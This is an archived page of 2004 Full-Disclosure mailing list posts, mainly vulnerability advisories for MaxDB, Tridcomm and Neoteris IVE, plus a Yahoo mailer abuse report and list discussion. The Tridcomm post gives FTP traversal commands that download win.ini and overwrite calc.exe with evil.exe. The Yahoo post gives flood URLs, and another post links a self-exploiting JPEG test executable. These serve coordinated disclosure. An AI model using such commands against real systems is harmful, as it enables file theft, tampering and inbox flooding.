Date: Wed Oct 06 2004 - 10:40:13 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
MySQL MaxDB Web Agent WebDBM Server Name Denial of Service Vulnerability
iDEFENSE Security Advisory 10.06.04a:
www.idefense.com/application/poi/display?id=150&type=vulnerabilities
October 6, 2004
I. BACKGROUND
MaxDB by MySQL is a re-branded and enhanced version of SAP DB, SAP AG's
open source database. MaxDB is a heavy-duty, SAP-certified open source
database that offers high availability, scalability and a comprehensive
feature set. MaxDB complements the MySQL database server, targeted for
large mySAP ERP environments and other applications that require maximum
enterprise-level database functionality.
II. DESCRIPTION
Remote exploitation of an input validation error in MySQL MaxDB could
allow attackers to trigger a denial of service condition.
The problem specifically exists due to improper input validation of a
user-supplied variable in the IsAscii7() function. Remote attackers can
send a specially crafted HTTP request to webdbm with the 'Server' value
containing ASCII values above 0x7F to cause an assert directive to fail,
resulting in a DoS condition.
wahttp:
ToolsCommon/Tools_DynamicUTF8String.hpp:249:
Tools_DynamicUTF8String::Tools_DynamicUTF8String(const SAPDB_Char *)
Assertion `IsAscii7(src)' failed.
Program received signal SIGABRT, Aborted.
[Switching to Thread 10251 (LWP 12706)]
0x40429781 in kill () from /lib/libc.so.6
III. ANALYSIS
Successful exploitation allows remote attackers to trigger a denial of
service condition on the web agent component of MaxDB.
IV. DETECTION
iDEFENSE has confirmed that SAP DB version 7.5 for both Linux and
Windows is vulnerable.
V. WORKAROUND
Use of an ingress perimeter firewall filter can help detect and mitigate
the risk of attack.
VI. VENDOR RESPONSE
"A solution for the issue is available with MaxDB 7.5.00.18."
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CAN-2004-0931 to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
08/16/2004 Initial vendor notification
08/16/2004 iDEFENSE clients notified
08/19/2004 Initial vendor response
10/06/2004 Coordinated public disclosure
IX. CREDIT
Patrik Karlsson (cqure.net) is credited with this discovery.
Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp
X. LEGAL NOTICES
Copyright (c) 2004 iDEFENSE, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerserviceidefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Directory traversal in Tridcomm 1.3
From: Luigi Auriemma (aluigiautistici.org)
Date: Wed Oct 06 2004 - 16:19:18 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
#######################################################################
Luigi Auriemma
Application: Tridcomm
http://www.tridcomm.com
Versions: <= 1.3
Platforms: Windows
Bug: directory traversal (both download and upload)
Exploitation: remote, versus the built-in FTP server
Date: 06 October 2004
Author: Luigi Auriemma
e-mail: aluigialtervista.org
web: http://aluigi.altervista.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Tridcomm is an open-source 3D file manager for Windows with a built-in
FTP server disabled by default.
#######################################################################
======
2) Bug
======
The built-in FTP server in Tridcomm is vulnerable to a directory
traversal bug.
Practically an attacker can watch into any directory and upload and
download any file in the disk on which Tridcomm is installed.
#######################################################################
===========
3) The Code
===========
dir ../../
dir /
get
../../windows/win.ini
win.ini
put
evil.exe
../../windows/calc.exe
(the same examples can be used with the backslash too)
#######################################################################
======
4) Fix
======
No fix.
No reply from the author.
#######################################################################
---
Luigi Auriemma
http://aluigi.altervista.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Yahoo! Spam Attack Mailers
From: xploitable (xploitablegmail.com)
Date: Wed Oct 06 2004 - 15:58:39 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Should I bother naming the Yahoo! service anymore or just start
listing the mailers.
mailer3.bulk.scd.yahoo.com is vulnerable to be used to attack Yahoo!
mail network and by the way it seems all the bulk mailers are
vulnerable.
I would imagine all the way up the numbers, such as mailer1, mailer2,
mailer3 and so on.
This one is used when a user clicks on a "Add to My Yahoo!". The
service allows Yahoo! consumers to add an RSS Yahoo! module to a
consumers My Yahoo! page. A link is then available for the consumer to
send the same module to a friend. Also Yahoo! News "E-mail this story
to a friend" uses the same bulk mailer.
All vulnerable to be used to attack Yahoo! Mail accounts. Mail will
goto the inbox and not the bulk mail folder. Allowing a malicious user
to very quickly flood inbox with repeated My Yahoo! RSS module links
or Yahoo! News story links.
Example for My Yahoo! RSS module mail to a friend page:
http://mtf.news.yahoo.com/mailto?url=http%3a//e.my.yahoo.com/config/cstore%3f.opt=content%26.node=1%26.sid=171771&title=Choose+Content&prop=mycstore&locale=us&h1=ymessenger+at+Yahoo!+Groups&h2=n3td3v&h3=http%3a//my.yahoo.com
Example for Yahoo! News story link mail to a friend page:
http://mtf.news.yahoo.com/mailto?url=http%3a//story.news.yahoo.com/news%3ftmpl=story%26u=/ap/20041006/ap_on_re_mi_ea/us_iraq_weapons&title=U.S.+Report+Finds+No+Evidence+of+Iraq+WMD%0a&prop=dailynews&locale=us&h1=ap/20041006/us_iraq_weapons&h2=T&h3=540
--
http://www.geocities.com/n3td3v
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] House approves spyware legislation
From: Ron DuFresne (dufresnewinternet.com)
Date: Wed Oct 06 2004 - 16:53:34 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Wed, 6 Oct 2004, Gregory Gilliss wrote:
> Great, Not that I'm any fan of spyware, but this is just another law
> against hacking. Think - what's the difference between this and someone
> using XSS to "take control" of a computer? If you r00t a box and deface
> the home page, then you've broken this law.
>
> <sigh> Instead of fixing the problem (poor software security) we pass
> laws to punish the people who do the things that illustrate the problem.
> Basic philosophical differences, blah blah blah ...
So, yer advocating that breaking into a system to say plant a file or to
do XSS tricks on the website is okay? As long as it's merely an
"illistration", correct?
Thanks,
Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [GoSecure Advisory] Neoteris IVE Vulnerability
From: Jian Hui Wang (jhwanggosecure.ca)
Date: Wed Oct 06 2004 - 16:08:41 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
GoSecure Advisory #GS041006
Neoteris IVE changepassword.cgi Authentication Bypass
Date Published: 2004-10-06
Date Discovered: 2004-07-23
CVE ID: CAN-2004-0939
Class: Design Error
Risk: Medium
Vendor: Juniper Networks
www.juniper.net
Advisory URL:
http://www.gosecure.ca/SecInfo/gosecure-2004-10.txt
Affected System:
Neoteris Instant Virtual Extranet (IVE) OS, Version 3.x Netories Instant
Virtual Extranet (IVE) OS, Version 4.x
Description:
Neoteris Instant Virtual Extranet (IVE) is a well known "clientless" SSL
VPN solution for internal network remote access via a standard web
browser. It is widely used as an extranet portal for corporate networks.
While doing an ethical hacking assessment of a Juniper customer,
GoSecure discovered a vulnerability regarding Neoteris IVE password
management.
When a valid user tries to authenticate via the IVE and the password is
expired, the user will be asked to change their password and be directly
forwarded to the "changepassword.cgi" without asking for any form of
authentication.
The username, authentication server and type will be appended to the
"changepassword.cgi" URL. Since the "changepassword.cgi" allows the
user to try the old password as many times as they want, the unit
effectively allows a brute force password attack.
If an attacker were to obtain a username through various public
information gathering techniques, they could attempt to find an account
with a password that has expired and brute force that account to
eventually gain unauthorized access.
This vulnerability only affects IVE products that are configured with
LDAP or an NT domain authentication server. Other type of authentication
servers are not affected.
Solution:
The vendor has released a patch and an advisory to address this issue.
The advisory is available the following location:
http://www.juniper.net/alerts/viewalert.jsp?actionBtn=Seach&txtAlertNumb
er=PSN-2004-08-25&viewMode=view
Credits:
GoSecure would like to thank Juniper's quick response on providing a
solution for its customers. This vulnerability was found by Jian Hui
Wang, part of GoSecure's vulnerability research team.
Copyright (c) 2002-2004 GoSecure Inc
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of Gosecure. If you wish to reprint the whole or any part of
this alert in any other medium excluding electronic medium, please email
infogosecure.ca for permission.
Disclaimer
The information within this advisory may change without notice. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatever arising out or in connection with the use or spread of
this information. Any use of this information is at the user's own risk.
http://www.gosecure.ca <http://www.gosecure.ca/>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Quick JPEG/GDI test & fix (timesaver)
From: GuidoZ (uberguidozgmail.com)
Date: Wed Oct 06 2004 - 17:53:32 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello list,
I wrote a very simple program/batch file that tests for the JPEG
exploit, then if affected, provides instructions on how to patch the
exploit. It has been tested on my own lil happy lab network, as well
as one one network where I'm a sysadmin. (Tested on Windows XP Home
and Pro, SP1a and SP2.)
It DOES test for the exploit by attempting to use an "infected" JPG
which downloads the instructions for fixing it, if exploited. By
viewing the strings in the JPG, you can see the file it downloads and
check it out for yourself. It's clean. =) Just contains a batch file
and a program to launch the batch file. (The file that gets downloaded
is a simple SFX.) Links are below. It contains a warning saying it's
about to try to exploit the system and to save data in open programs.
(It also warns that Explorer may crash.)
I wrote this merely to save myself time and allow friends/family to
test their own systems, then patch them without having to call me for
help. It's not been tested in every environment and in every scenario.
If you find a problem, feel free to email me (exploit _AT_ guidoz
_DOT_ com) Obviously I'm not responsible if it's abused somehow, or if
it breaks something, etc. Feel free to modify it to suit your own
needs, but use it at your own risk.
Test can be downloaded from here: http://www.guidoz.com/exploit-test.exe
Again, it's just an SFX archive with a batch file. Hopefully it will
save someone else some time. I've used it to have friends/family (and
a few clients) patch a total of around 30 machines without problems.
--
Peace. ~G
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] House approves spyware legislation
From: RandallM (randallmfidmail.com)
Date: Wed Oct 06 2004 - 18:09:45 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
<|>On Wed, 6 Oct 2004 05:03:45 -0700, Gregory Gilliss
<|><ggillissnetpublishing.com> wrote:
<|>> Great, Not that I'm any fan of spyware, but this is just
<|>another law
<|>> against hacking. Think - what's the difference between this and
<|>> someone using XSS to "take control" of a computer? If you
<|>r00t a box
<|>> and deface the home page, then you've broken this law.
<|>>
<|>> <sigh> Instead of fixing the problem (poor software
<|>security) we pass
<|>> laws to punish the people who do the things that
<|>illustrate the problem.
<|>> Basic philosophical differences, blah blah blah ...
<|>>
<|>> Worst of all, do you really think that the spyware rackets
<|>will slow
<|>> down or cease because of this? Nope - they'll just migrate
<|>out of the jurisdiction.
<|>>
<|>> -- Greg
<|>End of Full-Disclosure Digest
<|>
I guess one has to decide if browser hijacking is not the taking of personal
property. I for one do not fine it amusing to open my browser and it has
been redirected to a hijacked page as my new Homepage!
If this law would allow me...the user to bring down hell upon these people
then I'm all for it.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] real spam from secure
microsoft.com ?
From: GuidoZ (uberguidozgmail.com)
Date: Wed Oct 06 2004 - 18:28:24 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This is what caught my eye too. =) I guess it makes sense they would
want to inform you of a new PG key.
I agree however - a "Never talk to me again unless I email you" link
would be handy.
--
Peace. ~G
On Wed, 6 Oct 2004 08:00:00 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
> Well, the e-mail did say this... "You are receiving this email because
> you have communicated with the Microsoft Security Response Center using
> PGP in the past." Therefore it would make sense that they tell you about
> their new PGP key..as long as the sender is real...but that is another
> story.
>
>
>
>
> > -----Original Message-----
> > From: full-disclosure-adminlists.netsys.com
> > [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> > Georgi Guninski
> > Sent: Wednesday, October 06, 2004 6:18 AM
> > To: full-disclosurelists.netsys.com
> > Subject: [Full-Disclosure] real spam from securemicrosoft.com ?
> >
> > got this in my mailbox.
> >
> > looks like spam from securemicrosoft.com
> >
> > they don't even provide "unsubscribe" instructions.
> >
> > lamers.
> >
> > --
> > georgi
> >
> > ----- Forwarded message from Microsoft Security Response
> > Center <securemicrosoft.com> -----
> >
> > X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
> > Subject: New Microsoft Security Response Center PGP Key [pgp]
> > Date: Tue, 5 Oct 2004 15:40:01 -0700
> > X-MS-Has-Attach:
> > X-MS-TNEF-Correlator:
> > Thread-Topic: New Microsoft Security Response Center PGP Key [pgp]
> > Thread-Index: AcSrLElFE3KUx/ffQnuyvPfsYOdiBg==
> > From: Microsoft Security Response Center <securemicrosoft.com>
> > Cc: Microsoft Security Response Center <securemicrosoft.com>
> > X-OriginalArrivalTime: 05 Oct 2004 22:40:30.0206 (UTC)
> > FILETIME=[512D71E0:01C4AB2C]
> > X-MailScanner-Information: Please contact the ISP for more information
> > X-MScanner: Clean
> >
> > Hello!
> >
> > The Microsoft Security Response Center has generated a new
> > PGP key. We use this key to sign all security bulletin
> > notifications and encourage others to use this key when
> > sending sensitive information to us. Our new key is available at:
> >
> > - https://www.microsoft.com/technet/security/bulletin/pgp.mspx
> > - ldap://keyserver.pgp.com/ and other public PGP key servers
> > - At the bottom of this message
> >
> > You can verify the fingerprint of our key at:
> >
> > - https://www.microsoft.com/technet/security/bulletin/pgp.mspx
> >
> > A revoked copy of our former key is available at:
> >
> > - ldap://keyserver.pgp.com/ and other public PGP key servers
> > - At the bottom of this message
> >
> > If you would like to submit an encrypted security
> > vulnerability report, please email us at securemicrosoft.com.
> >
> > Sincerely,
> > Microsoft Security Response Center
> >
> >
> > New Key (0xAA55BC66):
> >
> > -----BEGIN PGP PUBLIC KEY BLOCK-----
> > Version: PGP 8.1
> >
> > mQINBEFi+0EBEACgvngZV4wYosOvN9ZngVtuAK+pasNuLIIv/mmu1NdIMA59d5RB
> > QUkx5ZUcN+C3tpSZAhj6u5+oeYH9u5JBsgA+V68kW6Xc1KDeOxDBM4k0yN8SeGt1
> > 2Svh8bJoS4XpM2p29eBtCc7Q2vyI+Na4DTkJn0Hmx6tqt1Ey0/KrBs9aacL10ZIM
> > ZeHk4VuhZ17eu1BuOzLhWy3Njm+t9rM/EIb3fkfeCrZVLhKXFkPRLdshMFuSkSEz
> > cUYiETQfe1D9mAy+VHM3KAkpseal2tRQhVlCqA0vWIZW6J/J/IgS+Nj6IBD3TH75
> > ASpLXfYYi7sBJJ01Vpg0kC39/TENIauyKtxtkjjYRTLzzHUR39ZsAD7HtP41K8Co
> > MsxHgvMPpqyKrxZk5ydDNf/AbBDQ3I9BhM3awuAeN7QFuNVs0UM+mIAAGpdBFbDf
> > ICes60Xa8Q8u36l3U73gaqKb6/eAF/540A2+8T/DANhvq1Q6cOEoqjVMJcp+Fxhf
> > zlp6e2MPfMyNg2Uakgrji6fIKqZSVpLFVB+Gi38mJUkmc27RhBp3qNzUnhuVQ3w4
> > r7mtOERCo3ueUxkHnlQk5ZLpmBh91k6Z7kZn3ahUABfsLxxJXExjXmp7MKLvoqwy
> > pk6Ive5bTIFUdIYL6EUZCUHoTxy/Mzlt17GveceglNxZ5Q6RJwLrCy5eLQARAQAB
> > tDlNaWNyb3NvZnQgU2VjdXJpdHkgUmVzcG9uc2UgQ2VudGVyIDxzZWN1cmVAbWlj
> > cm9zb2Z0LmNvbT6JAjoEEAECACQFAkFi+0EFCQJBcQAICwkIBwMCAQoCGQEFGwMA
> > AAAFHgEAAAAACgkQit4SBqpVvGbgfQ//SiDrz73ASvIa9AC5brB+vV8qZ4fRzlq2
> > TS1Q1rjho/KNWCnjbAD8UXQA+Sn7BClm4cclwCYt1wYZEQCfoNXlAp3ebdUgv2iu
> > +yYOW9CeUjGqe0BBcnHDNeNzexsAfybxPfSYjSBLwg8k+nZABGlXiVxf+Mg7uHwr
> > pFickGFTx9ZpCaxrnhwkHtCO6hgD1Tkmt7hFEX7PT1CHO86BwtKAY2Y/NvyH5pFA
> > 7RpUYyXST7iA1P9sxTJq9Vo89ehEePn/DrIqzyvVm3GTBsgjuDlCXilGemyEljHh
> > DuM0PWDqqOdUJWiXRcbA8GfbSpxw/aekBxBNMRO7svozY2egbLtf0HjWHNlZWdRT
> > kKsbThURK9IehLaN5IbOSfxvEgsm/g7zc8r4X1Et95Nk3svzczbgTlYv8h5lbhcr
> > jb5CkB1AwlMYIbjbzACwHKTHI7I/dd+cNk+j1t6cM6g7l23re9TSDdJaGbPJTwDF
> > bpx8X9IcMhrz8qBxQI8sYhqQPUwlNAAycfzcz5NjyiSPQp6u0ZQ1RKyqQ3vfzCr0
> > ycAISzF3MeUDBe+AXYC5hnNyfIk1R85vJG02Uki0M9P0sGrSkq+WyMtL07xb11S2
> > R1N7blFBpme8t/5tuiI/uIFAK0oeX0JJIoXP2PNRiCvSiArkD1B9iqrWX8EeAwhk
> > GbKvDhRGyxKJARUDBRBBYvvBjRlJFDED9SsBAaWpB/9lE9bCHI0Tl+Wuq3nc9Mdv
> > xJMNo9T79eTl2Dc9iN3XutGA43mifZYjvZtDtu0IJStw3WkU9ONGMGsgOabk1Gs6
> > ZSLCWR3pZAIiWUTYkjns/2GsPv5Nr4yWAZYIQM3Z9YpKYRNIo/xmHyuxxFOQ76j8
> > 9zmH9O8oOYM+PrrHEgr4i5VJrx3dwt3XCqQCuyBPVVMOz+r01CNeQzPI6EU9k9DZ
> > MVfPqn+XxJIwA0Dpm6oM0tj8CwPBgHu6Vh0y4GepWS0E6Go64KGeTs0JkrsCV0mp
> > wdIzsLrwrRbwPKPeXSmDObL4htNWpv0yk2Bq81/A46vuCXryeacmtP+kzd1eDXW5
> > uQINBEFi+0gBEACXCJy1mdqMCLRg7s5FUHA5M7+pfmAeVlKs8tmTvjocwXcPJxpR
> > HcfYzzInuVXYTDpPJMl7rTXi12lFBteHQBi3WZnQKrP+uSlDk0B4l62jiMK9BsGs
> > +i9LnRUDPjP9CZBENr3vdfVuVOCZJlV4rIeBCcFYdOWCzj7Q9LGWmmZvD4+1d29J
> > Lq/M1jurZsmqLcdLdKd8/OqRxT26bWTZQfC1RgWHeJxAmqMSqAS24d0Yu192+wPK
> > PojyrkSAp89Q4PWRZIV8mklY7S+EOtYSoIsK+FKcHt05t9Xcz/3Y5HPVpesJ7YqB
> > M1QV/znqtOJSzxfIOdUSRsSvIoI0JGhm3gZn6MqC8aMKZUNx2vxd2e+BpoPkMgML
> > uemzGz6hy3JyC6EKnkprSvu7V9h8kNnTSQaMg5E6lgG9SRaANlv59Z+KkT+CPmk6
> > 1I6ULJQED1N4KIMW7tnVPUyj4PJVvIjCkUISk+M0aisTidnw6fmPbpxZw18hT48n
> > 1sNk0scQbJ/SEt2dMBVre4puQYoQGg89dm1OayvFkujvJPYebj+0FfL+no3VsNdY
> > tgmqJ6I2Q3XTv7d7paj1upTB6Tulg8mCiu/MMMRdZ/KtOlWZLSfN6j+TFN+yjE5T
> > DmAzKXjUxWVN1ilQg90VFui/NLgRconHaADp0hhNer8FbLt1KnJOSXvyuQARAQAB
> > iQIoBBgBAgASBQJBYvtIBQkCQXEABRsMAAAAAAoJEIreEgaqVbxmaVUP/RxWAJHd
> > FZETOSc/NRNJ/iHPuBjLjIxiEMkUSKJPpWQa1CS47yryWY9qJsYSfDX+b18LLEJU
> > D4jeu4e5I4Ob5fDtOc4yuAK+/+t7pnGJ0J0HL+YYFERrXhXJEZnLyyWAF/cCcV8d
> > 9oLMbP0OW1pPjeBk5xOAE5YWNtTXo+T2RjSkBTLbgiDaPqFt9dSXxn3DepBTBlKd
> > xc/TX9hxlfoR7skaMtJiE27Y9E1zp0aIadeX7IlVvWKJMPyz8mFrliKdpSeTa+N4
> > aEx5F2qEmnBm80zoAquas7vTnHOwpOuH+AeIYCODh8PZRzepKWmu5ZL+heWyYr6Y
> > IaKeHYB4gL2xvQykrYlq498ypno7M6dDpUY2fbrh11zVwt1jXQR5VsiqWEE2Amug
> > uPsTdQOeDWxfKQkwLAgCo8teyKD0hXTLgQBz0VcbrFQ9U9cxIV+HX0LwkZB5DegT
> > ciKIPtwM+/sMzB/KzNMssYz7jiRGRgmLzXF92M2agALOkdb47O8JaYFbI4hqi6as
> > t3ov9GTNx+wCI4ki2B0OO46rMkO+YVtEOF+8rEDh0XY0jDa4SG6agWirlVqosgzY
> > BjeSbGL8eu6uhaVvs7wctEySX7m432rYkTbKSpN8ODujwVHjUJkf/hCuaQ3/uMSc
> > 1HHHG9y2Ge/WbE5hCsjYTBhrQEuIb6MInB3x
> > =oTL8
> > -----END PGP PUBLIC KEY BLOCK-----
> >
> >
> > Revoked Key (0x3103F52B):
> >
> > -----BEGIN PGP PUBLIC KEY BLOCK-----
> > Version: PGP 8.1
> >
> > mQENAziJZQwAAAEIALIflq+a5TJ5+rkJl6u4NtaEgeggoufIFy2O0luplLaE+3sw
> > E0MfG7Hr9b9yNLjMOD7/ZakIy4/54ph910K7qx1r3swo97gPuiDf11AhPzpmMe3m
> > iP2EV3XeoL0e69GF/AwZ/KB4im+/WMMqwHmF4OjWZX4PWG7QA3YM+mRg8x4768So
> > thxKx1sMO/ll1lAqryyzkWO3hODuOs7UiCPy0PgFBtlZ/qJU8VR/8z1vWX6aTDcl
> > 3plT6MXiQuBGWXb/jHHfUEC7s5BtmWtA/Sdxf/oVDothMg48otI6tetzf/Rp6asa
> > PmmOH99+QE2At4YYbtK3a7/ss7YTjRlJFDED9SsABRGJARUDBSBBYvxIjRlJFDED
> > 9SsBAbW2B/4ttsEK/Tqi7aADS8IEUZK0Apum68kclT4VbTzuunQBFLqfiR2NiCNO
> > xMA4ar4BIw5q37gl+V90hhwe2tSBBVvnHhCJwvSG8egEj2jq+m73Ov2wrMw7Lef7
> > o5OfPeBkZEopZSlJoofceOS6E08rQF6VGWsoYMhiF45M3vhI1gdTYoX8SEcRUtqx
> > 0A4a6eCh1AMl+/1KtyWfslmkUY2hIhsb3mdo+H3dkJZ5oD5ANlmcdsxdrCO5dqrz
> > fZTsp5UieCajSD7tUhhU0yFu5q90IGvbeTZ7fS6j+CKhDkeFTstT0WIUmoq/gvb3
> > Gsk8VeM2tzn5eZgJMcEzvtXHiQ0zd5GotDlNaWNyb3NvZnQgU2VjdXJpdHkgUmVz
> > cG9uc2UgQ2VudGVyIDxzZWN1cmVAbWljcm9zb2Z0LmNvbT6JARUDBRA4iWUMjRlJ
> > FDED9SsBAZgpB/0XmLeOzIS0PJZPrYaTcJ8FqRTGJ4YtdfPbGcvhh6eOKQnUO3X7
> > m0dvyYgiI5V6rUejLuTc0p47d5dte7LNdf1/ormUeH4zkzRc9W++zPzsEzzTZGU8
> > S+ZydwSAXEwykWhK05OaGbeZ11D6cyMDPxkNewPaJC+qjhXK3jUf2unDvA4jwYG7
> > 4K7OetPjaRJNpQQT+8r2hyasKkJ0UAmdebqobSJfwZcRGBN9l1oLvpNUca0Ubltz
> > V/UNHBF5oqEoiPtVd9RNB+j2vHu1cvxDkbDaKUYIma/yQTjdLwqw31E5cI1Ln6Qp
> > zNlQbzYvztwtgYSaC/YRBdF9K80DfO49cKTuiQBGBDARAgAGBQI/r7EHAAoJEEcx
> > dTMMgeE8SV8AoIhhcp6kBFp3qFmORDsmxA9BcXX+AKDArVN9Wekum9MY4jRMtAqO
> > vctzzIkARgQwEQIABgUCP5dh+wAKCRBitBUwiu7kNkv2AJ9ov2PBRjYnfSoORZj2
> > hea+77qqXgCeLLIrmE5i2JlYd/jBsqWBKSFMbCiJAEYEMBECAAYFAjt6gGUACgkQ
> > GQzQFUWcpu/oHwCffBoKzX1fsoIteC4kSxd5KuhbblcAoMKaVkk0XNCDnSMIdgAh
> > YB7GYgLJiQBJBDARAgAJBQI9OraaAh0gAAoJEM6A1gBt+KUHH0sAnipXgrBpKGWB
> > NW2vbnAVIRtyLATuAJ9OHv5JtWxKFAryOxcn0sB2C/FjyIkARgQwEQIABgUCPxZv
> > aQAKCRBvBMNExA+h3B9JAJ0WQHPK0UCp8JM+1Y2xziHWHTU9iACglWGGssKpzDbq
> > B9475tTeL/+i2zY=
> > =Ff87
> > -----END PGP PUBLIC KEY BLOCK-----
> >
> >
> > You are receiving this email because you have communicated
> > with the Microsoft Security Response Center using PGP in the past.
> >
> > ----- End forwarded message -----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Re: Hello
From: Jkuperus (jkuperusplanet.nl)
Date: Wed Oct 06 2004 - 19:13:27 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]